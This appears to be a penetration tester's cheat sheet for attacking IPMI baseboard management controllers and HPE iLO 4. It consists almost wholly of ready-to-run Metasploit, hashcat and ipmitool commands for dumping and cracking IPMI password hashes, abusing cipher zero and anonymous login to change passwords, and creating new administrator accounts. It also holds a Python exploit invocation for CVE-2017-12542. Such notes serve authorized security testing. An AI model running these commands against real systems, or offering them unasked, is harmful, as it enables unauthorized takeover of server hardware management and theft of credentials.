# IPMI * * ## Discovery ``` msf > use auxiliary/scanner/ipmi/ipmi_version msf > set RHOSTS file:ipmi.txt msf > set THREADS 25 msf > run ``` ## Dump Hashes **CVE-2013-4786** Dump hashes: ``` msf > use auxiliary/scanner/ipmi/ipmi_dumphashes msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt msf > set RHOSTS file:ipmi.txt msf > set THREADS 25 msf > run ``` Recover plaintext passwords: ``` $ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username ``` ## Cipher Zero **CVE-2013-4805** Discover with MSF: ``` msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero msf > set RHOSTS file:ipmi.txt msf > set THREADS 25 msf > run ``` Guess existing admin username. If `ADMIN` username is correct, the `list` command will succeed (password doesn't matter): ``` $ sudo apt install ipmitool $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list ``` Add new admin user (only existing admin username is needed): ``` $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name snovvcrash $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password 'Passw0rd!' $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv 4 $ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable ``` ## Anonymous Authentication Can be discovered with MSF `ipmi_dumphashes` but also with ipmitool: ``` $ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list ``` Change password of a named user account: ``` $ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password 'Passw0rd!' ``` ## HPE iLO 4 * * ### Add Admin User **CVE-2017-12542** Exploit with Python: * ``` $ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1 ``` Exploit with MSF: ``` msf > use auxiliary/admin/hp/hp_ilo_create_admin_account msf > set RHOSTS 10.10.13.37 msf > set USERNAME snovvcrash msf > run ```